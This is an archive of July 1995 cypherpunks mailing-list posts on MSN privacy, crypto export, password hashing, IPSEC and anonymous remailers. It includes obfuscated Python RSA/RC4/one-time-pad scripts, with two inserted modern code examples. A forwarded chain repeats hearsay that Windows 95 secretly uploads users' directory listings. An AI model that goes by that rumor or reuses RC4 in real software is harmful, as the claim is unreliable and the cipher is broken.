     VeriSign        Web Augustine     415/508-1151

     ###

     RSA Public Key Cryptosystem and PKCS are trademarks of RSA Data
     Security, Inc. All other product or company names are trademarks of
     their respective corporations.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Bizzell <tomb@syntec.com>
Date: Mon, 24 Jul 95 09:54:11 PDT
To: cypherpunks@toad.com
Subject: MSN privacy
Message-ID: <QQyzuh11543.199507241652@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Here is some info that was circulating around our office today.


> *** Forwarding note from KKASTRP --RHQVM12  07/10/95 10:43 ***
> To: KURT    --RHQVM02  Anderson, K. K.    LLANDER --RHQVM17  Anderson, L.L.
>
>            Karen R. Kastrup 8/826-4664 9/(914)766-4664
>            Manager, Services Accounting
>            Somers 4, 3J36
> Subject: Windows 95
>
> *** Forwarding note from KASTRUP --ISSCVM   07/10/95 10:31 ***
> To: KKASTRP --RHQVM12
>
> *** Resending note of 07/10/95 09:43
> STAN KASTRUP
> ISSC - INFORMATION STRATEGY & MANAGEMENT
> 8/351-3229 9/(914) 288-3229
> SUBJECT: Windows 95
> Amazing!  (I chopped off about 10 "forwards.")
>   ------- Forwarded Message
>
>    >  From: Carlos Shaw       IBMMAIL:USIB2T2D     cshaw@vnet.ibm.com
>    >  ***************************************************************
>    >  Subject: news on Windows95
>    >  ----------------------------------------------------------------------
>    >  Newsgroups: comp.risks
>    >  From: cnorloff@tecnet1.jcte.jcs.mil
>    >
>    >  Date: Wed, 17 May 95 13:44:40 EDT
>    >
>    >  Microsoft officials confirm that beta versions of Windows 95 include a
>    >  small viral routine called Registration Wizard.  It interrogates every
>    >  system on a network gathering intelligence on what software is being run
>    >  on which machine.  It then creates a complete listing of both Microsoft's
>    >  and competitors' products by machine, which it reports to Microsoft when
>    >  customers sign up for Microsoft's Network Services, due for launch later
>    >  this year.
>    >
>    >  "In Short" column, page 88, _Information Week_ magazine, May 22, 1995
>    >
>    >  The implications of this action, and the attitude of Microsoft to plan
>    >  such action, beggars the imagination.
>    >
>    >  An update on this. A friend of mine got hold of the beta test CD
>    >  of Win95, and set up a packet sniffer between his serial port and the
>    >  modem. When you try out the free demo time on The Microsoft Network, it
>    >  transmits your entire directory structure in background.
>    >  This means that they have a list of every directory (and, potentially
>    >  every file) on your machine. It would not be difficult to have something
>    >  like a FileRequest from your system to theirs, without you knowing about
>    >  it. This way they could get ahold of any juicy routines you've written
>    >  yourself and claim them as their own if you don't have them copyrighted.
>    >
>    >  Needless to say, I'm rather annoyed about this.
>    >  So spread the word as far and wide as possible: Steer clear of
>    >  Windows 95.
>    >  There's nothing to say that this "feature" will be removed in the final
>    >  release.
>    >
>    >  David
>    >
>    >  Carlos Shaw                | nodeid/userid: stlvm6(cshaw)
>    >  IBM - STL (J95/E443)       | (408) 463-4995; (tie) 8-543-4995
>    >  555 Bailey Ave             | fax (408) 463-4763; (tie) 8-543-
>    >  San Jose, CA 95141         | CompuServe id: 73203,1424
>    > Subj: news on Windows95
>    >
>
>
>
>
>-------- End of Forwarded Message
>
>

-------------------------------------
E-mail: dough@syntec.com (Doug Hadley)
Date: 07/24/95
Time: 10:54:04
-------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 24 Jul 95 09:09:10 PDT
To: cypherpunks@toad.com
Subject: PKA_boo
Message-ID: <199507241608.MAA12003@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-24-95. NYPaper:


   [Denise Caruso's column] "New Microsoft network will offer
   a wealth of privacy."

      It seems unthinkable that anything has been left unsaid
      about the Microsoft Network. And even less has been said
      about MSN's design, which Microsoft has said complies
      with the new data-privacy rules that the European Union
      is expected to adopt in September. The new European
      policy would set out clear guidelines about the way in
      which companies -- in this case, Microsoft and its
      independent content providers -- can collect and use the
      personal data about their European customers that the
      companies gather electronically. Microsoft has said it
      plans to extend the same privacy provisions to its
      American customers. The European provisions are a
      striking departure from current practices in the United
      States, where few restrictions protect consumers from
      marketeers, who collect and sell consumers' personal
      information.                                   PEK_boo










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 24 Jul 95 11:32:56 PDT
To: Tom Bizzell <tomb@syntec.com>
Subject: Microsoft Stealing...IS....Re: MSN privacy
In-Reply-To: <QQyzuh11543.199507241652@relay3.UU.NET>
Message-ID: <Pine.BSI.3.91.950724132816.21153A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't see why you call it what it really is.
It is stealing.
For if you reversed the process on Microsoft,
as you had any contact with them,
I'm sure that's what they'd call it.

It's no different than being seductive
while you remove their wallet.

Stealing yes, privacy no.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 24 Jul 95 11:06:46 PDT
To: Mole Rat <an253398@anon.penet.fi>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507200542.AA23518@anon.penet.fi>
Message-ID: <Pine.BSD/.3.91.950724135143.25983E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jul 1995, Mole Rat wrote:

>      Sounds like an untapped market segment.  In which periodicals
>      should one advertise consulting services in order to cover the
>      mobster market?

For those of the anonymous pay-me-in-(digital/physical)-cash only
underground types, yes.

>      Seriously, I imagine that organized crime, like any other
>      business, uses computers.  Their level of crypto usage could be
>      impressive, given the incentives.

Speculation of course.  No better, or closer to the truth either one way 
or the other?  (Any of you anons work for the mob?  if so, is the mob 
'puter-happy?)

>      "There is no honor among thieves."  Wiretaps, bugs, tails,
>      informants, and good, old-fashioned, physical intimidation
>      probably produce plenty of leads.

Two logical possibilities.

  0. Mobsters still get caught and thrown in jail.
  1. They don't use crypto at all.  All records are in the open and 
searchable.  LEA's wet dream.
  2. They use strong crypto and can't be caught at all.  LEA's nightmare.
  3. They use crypto, but are still catchable (oops, the secret is out of 
the bag now, cancel all the computer related RICO nonsense.)
  4. They don't use crypto, but keep no records, or hide them well.  They 
can still be caught by LEA's.

  3 & 4 are the most likely, and the LEA's shameful little secret.  They 
cry wolf to set a wolf trap, but meanwhile they're hunting wabbits, not 
wolves.  

>      I wasn't entirely facetious above about working for the mob,
>      they probably pay well and don't bother with FICA and such.  Plus
>      there's that "family" atmosphere....

Errmm.. precisely the reason to stay away from them.  While the first few 
parts of your above paragraph are quite tempting, the last sentence is 
deadly.  You can't quit from your "family" without cement shoes.  So I'll 
stay away from that line of ...um... work. 


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Gorsuch <chrisg@chrisg.itg.ti.com>
Date: Mon, 24 Jul 95 12:13:41 PDT
To: cypherpunks@toad.com
Subject: re: big dictionaries
Message-ID: <199507241910.OAA00283@chrisg.itg.ti.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill,
   Good point about using a "slow" hash algorithm.  A "dictionary" attack on
the hash should fail because, in order to currently use the password the old
password had to not be in the dictionary in the first place.  However "keyspace"
attacks (brute force) would still be quite feasible.  Would probably want to
put something similar to a salt in there to help increase the keyspace.
   Keep in mind that the only reason I suggested a hash at all is to prevent an
admin who, in general, would not go through the effort to replace login/password
or install a sniffer to get your password, but might be "unnecessarily" tempted
by having easy to access passwords stored in plaintext on the server (still 
in a file only the admin could read).  Basically just as a method to keep
honest people honest.
   To verify that a user wasn't using a variation on the original, you would 
want to only store the hash of the original, but do hashes of the variants on
the "new" password and compare with the stored hash of the old password.  And
of course, only store a password AFTER it has been changed.
   Really paranoid admins should use challenge/response/one-time passwords 
with/or kerberos.

chris gorsuch
chrisg@ti.com
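
The check described in the message above, written out as an added Python example (not code from the post or from any list member): only a salted, slow hash of the retired password is kept, and a proposed new password is tested by hashing guesses at what the old one could have been. PBKDF2-HMAC-SHA256, the work factor, the rule list and every function name are assumptions chosen for illustration; the sample passwords are constructed.

```python
import hashlib
import hmac
import os
import string

ITERATIONS = 200_000  # assumed work factor for the "slow" hash; tune per host
STRIP = string.digits + string.punctuation


def slow_hash(password, salt, iterations):
    """Deliberately expensive salted hash (PBKDF2 is this example's choice)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def retire_password(old_password, iterations=ITERATIONS):
    """Build the only record kept of a password once it has been changed.

    The per-record random salt plays the role of the "something similar to
    a salt" from the message: equal passwords give unrelated hashes.
    """
    salt = os.urandom(16)
    return {"salt": salt, "iterations": iterations,
            "hash": slow_hash(old_password, salt, iterations)}


def possible_originals(new_password):
    """Yield (rule, guess) pairs: passwords the new one may be a variant of.

    The old plaintext is gone, so the transformations are applied to the
    new password, which the server does hold in memory during the change.
    Each rule names how the guess was derived from the new password.
    """
    p = new_password
    stem = p.rstrip(STRIP)
    rules = [
        ("identical", p),
        ("case swapped", p.swapcase()),
        ("lowercased", p.lower()),
        ("uppercased", p.upper()),
        ("reversed", p[::-1]),
        ("trailing digits/symbols removed", stem),
        ("leading digits/symbols removed", p.lstrip(STRIP)),
    ]
    if p and p[-1] in string.digits:
        rules += [("last digit changed", p[:-1] + d) for d in string.digits]
    rules += [("suffix replaced by one digit", stem + d) for d in string.digits]

    seen = set()
    for rule, guess in rules:
        if guess and guess not in seen:  # skip empty and duplicate guesses
            seen.add(guess)
            yield rule, guess


def matches_retired(record, new_password):
    """Return the rule that links new_password to the retired one, or None.

    Cost is one slow hash per guess, and only variants listed in
    possible_originals() are caught.
    """
    for rule, guess in possible_originals(new_password):
        digest = slow_hash(guess, record["salt"], record["iterations"])
        if hmac.compare_digest(digest, record["hash"]):
            return rule
    return None


if __name__ == "__main__":
    # Constructed sample data: the password being retired and some proposals.
    record = retire_password("heron-Gate7")
    for proposal in ("heron-Gate8", "HERON-gATE7", "heron-Gate7!",
                     "7etaG-noreh", "correct horse battery"):
        rule = matches_retired(record, proposal)
        verdict = "rejected (%s)" % rule if rule else "accepted"
        print("%-24s %s" % (proposal, verdict))
```
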




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Mon, 24 Jul 95 11:15:58 PDT
To: shabbir@panix.com (Shabbir J. Safdar)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507220451.AAA25935@panix4.panix.com>
Message-ID: <199507241813.OAA20458@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> Let's read the bill and get ready for a fight.  We should hold Grassley
> accountable for this next election.  But we're spinning our wheels by
> acting against every bill that affects one of our issues.
> 
> -Shabbir

I'd agree with the gist of Shabbir's entire message, except the last 
sentence, which I think needs some qualification.  Trying to fight every 
useful fight right now *is* counter-productive, because we're not at a 
stage yet where any of our organizations, or our coalitional 
meta-organization, can handle the load.  And the grassroots activist
infrastructure of the net can't handle it either.  But, that's not the 
way it should be.  We need to, and if we all work at it, we will, get to 
the state at which we can handle the load, and can fight all the good fights.

Part of what's needed is, frankly, for folks like those reading this 
message to take a little time out from endless arguments on newsgroups 
and mailing lists, from all the entertainment and fun, and become a
little more politically active so we can preserve the possibility of
having any fun at all.  How many of you are organizing groups like
EF-Houston or VTW or SEA on a local or state basis?  I don't imagine many
virtual hands are raising.  Hop to it folks.  This is not a
one-dimensional fight, it's three dimensional.  You've got lobbying and
national-level policy work being done, but local grassroots organizing
via the net is still in a larval stage, and needs to be advanced. So does
coordinated response to crap journalism and lack of serious coverage of
the issues we find important.  Get in touch if you're interested in
helping start local groups.  I'll keep a geographical list and try to put
fairly close matches in contact with each other.


--
<A HREF="http://www.eff.org/~mech/">          Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>   Online Services Mgr.      



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 24 Jul 95 11:54:53 PDT
To: cypherpunks@toad.com
Subject: NOD_off
Message-ID: <199507241854.OAA01658@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-24-95. NYPaper:


   "For I.B.M. Faithful, Questions About Windows 95."

      These are difficult days for OS/2 users. "Every time I
      say I am an OS/2 user, I get immediately marginalized,"
      an elderly woman confided to a young man sitting next to
      her at last week's OS/2 World convention in Boston.
      "It's amazing what saying you are an OS/2 user brings
      out in people."

      "You just have to explain that you are at the cutting
      edge of a powerful new technology," the young man
      advised her with a heavy dose of sarcasm.      WRP_spd


   "Computer Pornography Hearing Will Not Include Expert
   Witness."

      The principal researcher in a computer pornography study
      will not testify at today's Senate hearing on children
      and computer pornography. Senator Charles E. Grassley,
      Republican of Iowa, removed the researcher, Marty Rimm,
      from the witness list late last week, after Carnegie
      Mellon University announced a formal investigation into
      whether Mr. Rimm and his faculty advisers had violated
      academic and ethical guidelines in preparing and
      publishing their study.                        WIT_les



   1 +1: NOD_off









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Mon, 24 Jul 95 18:21:06 PDT
To: mp@io.org (M. Plumb)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <199507241415.KAA26817@wink.io.org>
Message-ID: <m0saTpk-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text




marc:
> However, goods of U.S. origin are export restricted, unless said
> goods are further processed outside the U.S. so as to result in a
> substantial change in value, so some of the PGP development would
> need to be done in Canada.

How about compiling it? THAT is "further processing"......

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 24 Jul 95 13:43:58 PDT
To: cypherpunks@toad.com
Subject: Python export-a-cryptosystems
Message-ID: <m0saUL1-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I hadn't seen this on the list, so I'm forwarding it.

(I may have skipped it in my 'catchup on a rainy day' mail archive.)

A friend arranged a lunch today with Guido (the author of Python,
Guido van Rossum <guido@CNRI.Reston.VA.US>) and a few other friends.
I haven't formed an opinion of Python yet.

Notice that bc/dc isn't needed.

------- Forwarded Message

Date:    06 Jul 1995 14:20:13 +0000
From:    Andrew KUCHLING <fnord@maggie.cs.mcgill.ca>
To:      python-list@cwi.nl
Subject: Re: Obfuscated Python

Following modifications from Richard Jones and Guido van Rossum, we've
now achieved a 4-line RSA script.  (Shouldn't we all be doing some
*real* work, I wonder? :) ) I've added a 2-line one-time pad program,
which simply XORs the contents of the two files whose names are
provided on the command line.  Generation of random data (and securely
exchanging it with your correspondent) is left as an exercise for the
reader.

So, the Python export-a-crypto-system-sigs are:

   Try: echo 'This is a test.' | rsa.py 10001 1967cb529
#!/usr/local/bin/python -- -export-a-crypto-system-sig -RSA-in-4-lines-Python
from sys import*;from string import*;a=argv;[s,p,q]=filter(lambda x:x[:1]!=
'-',a);d='-d'in a;e,n=atol(p,16),atol(q,16);l=(len(q)+1)/2;o,inb=l-d,l-1+d
while s:s=stdin.read(inb);s and map(stdout.write,map(lambda i,b=pow(reduce(
lambda x,y:(x<<8L)+y,map(ord,s)),e,n):chr(b>>8*i&255),range(o-1,-1,-1)))

   Try: echo 'This is a test.' | rc4.py messagekey
#!/usr/local/bin/python -- -export-a-crypto-system-sig -RC4-in-4-lines-Python
from sys import*;st,x,y,i2,k,s=range(256),0,0,0,map(ord,argv[1]*256)[:256],1
for i in st[:]:i2=(k[i]+st[i]+i2)%256;st[i],st[i2]=st[i2],st[i]
while(s):s=stdin.read(1);x=(x+1)%256;y,c=(y+st[x])%256,len(s)and ord(s);(
st[x],st[y])=st[y],st[x];stdout.write(chr(c^st[(st[x]+st[y])%256])[:len(s)])

   Try: otp.py message pad >ciphertext
#!/usr/local/bin/python -- -export-a-crypto-system-sig -OTP-in-2-lines-Python
from sys import*;t=p=1;s,i,j=stdout,open(argv[1], 'r'),open(argv[2], 'r')
while(t and p):t,p=i.read(1),j.read(1);t and p and s.write(chr(ord(t)^ord(p)))

        Andrew Kuchling
        andrewk@cst.ca
        fnord@cs.mcgill.ca
               (http://www.cs.mcgill.ca/~fnord)


sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95
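
Added example (not part of Andrew Kuchling's post or of the forwarded message): a readable Python 3 port of the RC4 and OTP signature scripts above, so the key schedule, the keystream loop and the XOR step can be followed and checked against widely published RC4 test vectors. The function names and the strict pad-length check are assumptions of this example; the original OTP script simply stops at the shorter of its two input files.

```python
"""Readable Python 3 ports of the RC4 and OTP signature scripts (added example)."""
from itertools import islice


def rc4_key_schedule(key: bytes) -> list:
    """Key-scheduling step: the script's `for i in st[:]` loop."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    # The script builds k with map(ord, argv[1]*256)[:256]: the key is
    # repeated and cut to 256 bytes, which is the same as key[i % len(key)].
    k = (key * 256)[:256]
    st = list(range(256))
    i2 = 0
    for i in range(256):
        i2 = (k[i] + st[i] + i2) % 256
        st[i], st[i2] = st[i2], st[i]
    return st


def rc4_keystream(key: bytes):
    """Keystream generator: the script's `while(s)` loop without the I/O."""
    st = rc4_key_schedule(key)
    x = y = 0
    while True:
        x = (x + 1) % 256
        y = (y + st[x]) % 256
        st[x], st[y] = st[y], st[x]
        yield st[(st[x] + st[y]) % 256]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: XOR with the keystream is its own inverse."""
    return bytes(c ^ k for c, k in zip(data, rc4_keystream(key)))


def otp_xor(message: bytes, pad: bytes, strict: bool = True) -> bytes:
    """XOR a message with a pad, byte by byte.

    strict=False reproduces the script's behaviour: output stops at the
    shorter input, so a short pad silently truncates the message.
    strict=True (an assumption of this example) refuses a short pad.
    """
    if strict and len(pad) < len(message):
        raise ValueError("pad is shorter than the message")
    return bytes(t ^ p for t, p in zip(message, pad))


if __name__ == "__main__":
    sample = b"This is a test.\n"      # constructed sample input
    ct = rc4(b"messagekey", sample)
    print(ct.hex())                     # ciphertext as hex
    print(rc4(b"messagekey", ct))       # same call decrypts
    print(bytes(islice(rc4_keystream(b"Key"), 5)).hex())
```

RC4 is shown here only to make the 1995 script readable; RFC 7465 prohibits its use in TLS.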



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Mon, 24 Jul 95 14:18:12 PDT
To: cypherpunks@toad.com
Subject: IPSEC
Message-ID: <9507242118.AA04814@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


For those interested in reading up on the IPSEC work, check out
ds.internic.net's "internet-drafts" directory. The following are the
drafts that you will want to look at.

draft-ietf-ipsec-ah-md5-03.txt
draft-ietf-ipsec-arch-02.txt
draft-ietf-ipsec-auth-02.txt
draft-ietf-ipsec-esp-01.txt
draft-ietf-ipsec-esp-des-cbc-04.txt
draft-ietf-ipsec-photuris-02.txt

I believe that the -ah-xx.txt draft is missing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 24 Jul 95 17:55:50 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: An idea about Java and remailer clients and servers...
Message-ID: <v02120d03ac39fe80b194@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



> I forgot to add. There is no reason User X has to run his remailer
>immediately. His software could simply commit to running a remailer for
>1 hour at some specified future date < some threshold. Any messages
>sent to him for remailing would be queued until that time. Therefore,
>all your technique would tell you is that the user remailed a message
>sometime between date X and date Y. if Y-X > few days to week or two,
>the intelligence gathered on User X is minuscule. Traffic analysis would
>detect User X using the remailer network anyway.
>

When I've thought about this, it's been from the p.o.v. of message
senders being able to earn prepaid service tokens (not unlike
digital cash) for offering their machine as a remailer for a set
period of time or number of messages or total bandwidth or
whatever. This activity could be completely asynchronous to any
origination of messages, and, in fact, a regular habit of accumulating
tokens like this would make for excellent cover traffic.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Mon, 24 Jul 95 16:32:49 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: IPSEC
In-Reply-To: <9507242118.AA04814@webster.imsi.com>
Message-ID: <199507242332.TAA07652@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> For those interested in reading up on the IPSEC work, check out
> ds.internic.net's "internet-drafts" directory. 

Another place I found them is in ftp://ietf.cnri.reston.va.us/internet-drafts/

(ds.internic.net seems to be hosed today (!))

There's a brief summary of each IPSEC draft, with hyperlinks to the texts, at 
http://www.ietf.cnri.reston.va.us/ids.by.wg/ipsec.html



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 24 Jul 95 16:49:41 PDT
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl>
Message-ID: <199507242349.TAA23120@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Phil Fraering writes:
> >  Why not "charge" for the ability to send an anonymous message with
> >  the duty to have for a short time (maybe an hour or two) running
> >  on your machine a node in a remailer network?
> 
> User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
> to Machine B.  User Y on Machine C receives an anonymous mail from Machine
> B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
> himself to User X.  User X's temporary remailer does as it's told.  User Y
> now has a strong reason to suspect User X has sent the said mail.

  If the "duty" cycle is 1 hour and there are 10000 users utilizing
the network, that tells you nothing. All it does is confirm that
User X sent a remailer message within the last hour. One could just
as easily finger User X and use the same reasoning.

  And if one has to suspect User X in the first place, User X has already
blown his cover partially (either by writing style or other leaks)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 24 Jul 95 16:55:30 PDT
To: cypherpunks@toad.com
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl>
Message-ID: <199507242355.TAA26223@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Phil Fraering writes:
> >  Why not "charge" for the ability to send an anonymous message with
> >  the duty to have for a short time (maybe an hour or two) running
> >  on your machine a node in a remailer network?
> 
> User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
> to Machine B.  User Y on Machine C receives an anonymous mail from Machine
> B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
> himself to User X.  User X's temporary remailer does as it's told.  User Y

 I forgot to add. There is no reason User X has to run his remailer
immediately. His software could simply commit to running a remailer for
1 hour at some specified future date < some threshold. Any messages
sent to him for remailing would be queued until that time. Therefore,
all your technique would tell you is that the user remailed a message
sometime between date X and date Y. if Y-X > few days to week or two,
the intelligence gathered on User X is minuscule. Traffic analysis would
detect User X using the remailer network anyway.

-Ray







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 24 Jul 95 18:18:15 PDT
To: cypherpunks@toad.com
Subject: An idea about Java and remailer clients and servers...
In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl>
Message-ID: <199507250113.AA24873@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes, concerning the "you want a remailer, you run one" idea:

   User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
   to Machine B.  User Y on Machine C receives an anonymous mail from Machine
   B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
   himself to User X.  User X's temporary remailer does as it's told.  User Y
   now has a strong reason to suspect User X has sent the said mail.

   Cpunks write code and all, but I don't think this one's going to work. :-(

I was thinking in terms of User X running one node in a mixmaster
network. AFAIK, mixmaster doesn't work in one-bounce mode; otherwise,
why would it go through all the trouble of breaking up the messages,
etc.?

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Mon, 24 Jul 95 18:45:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507250113.AA24873@tyrell.net>
Message-ID: <199507250145.VAA08413@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
> I was thinking in terms of User X running one node in a mixmaster
> network. AFAIK, mixmaster doesn't work in one-bounce mode; 

The sender can ask the client to set the number of hops as low as 1, if 
she/it/he so desires.

I think Doug Barnes has suggested the best protocol for handling "co-op
remailing" ;)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 24 Jul 95 14:12:17 PDT
To: cypherpunks@toad.com
Subject: Regulatory Arbitrage Server
Message-ID: <199507242112.AA00932@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Please check out:

 'http://www.replay.com/exon',


for the problems and suggestions about the scripts mail
Adam Back <aba@dcs.ex.ac.uk>

for flames mail me.

Have Fun!
--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 24 Jul 95 21:18:22 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Pine.SUN.3.91.950713143406.17575A-100000@crl8.crl.com>
Message-ID: <Pine.3.89.9507242320.A14545-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Thu, 13 Jul 1995, Perry E. Metzger wrote:
> 
> > As unpleasant as the congress is, it isn't the enemy. The governmental
> > forces desiring control are not the same as the congress.
> 
> I'm not so sure.  Both politicos and bureaucrats go into their
> respective lines of work for many reasons.  One of the main 
> reasons--in my opinion--is a lust to control others.  Being the 
> "others," we should resist this tendency.  This begins with the
> realization that most of them *are* the enemy and acting 
> accordingly.
> 

Well, now, I wouldn't say THAT....

There are those of us intent enough of defending our rights as to go so 
far as to make an effort of getting to where we can do so more easily.  
While I know I was shouted down over NYET, the group does know where I 
stand on the issue of, for instance, free crypto or the Exon Hustler 
Protection Act.  I intend to run for JP in '98, and (assuming our 
electoral system, if not our Constitution is still intact) higher office 
later.  If I win, you can bet your keyring passwords that _I_ will make 
sure that my juries are aware of FIJA's position papers.

There are others--including one John Tello, a member of the Texas State 
Republican Executive Committee, who almost single handedly got a unanimous 
resolution out of the TX SREC calling for an end of our 60-year emergency 
and a recision of various related acts.

Bluntly, if you are bellyaching but _not_ involved with an organized 
political structure that is capable of influencing legislation, then I 
blame YOU for this legislation.  I am, have, and/or shall have lobbied every 
Congressman with whom I can claim a minimal connection.  And I've done 
the work so that this is a non-trivial list.

Direct mail is useful.  But until you've worked to get someone elected, 
you are just one more voice in the roar.  The '96 campaigns are shaping 
up.  (I'm already putting the word out for '98...)  This is the time to 
find people who share our views, and work so that they win their 
primaries--or maybe don't even have to fight one.  Or maybe it's time 
_you_ ran.


Nathan

Crypto-Christo-punk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Mon, 24 Jul 95 21:26:27 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
In-Reply-To: <Pine.SOL.3.91.950724234854.130D-100000@use.usit.net>
Message-ID: <Pine.SOL.3.91.950724232244.24512K-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Okay, thing is, I read all of the below, and it seems like 
the guy's trying hard to tell you that he'd bend over 
backward to make this case, even to the extent of associating
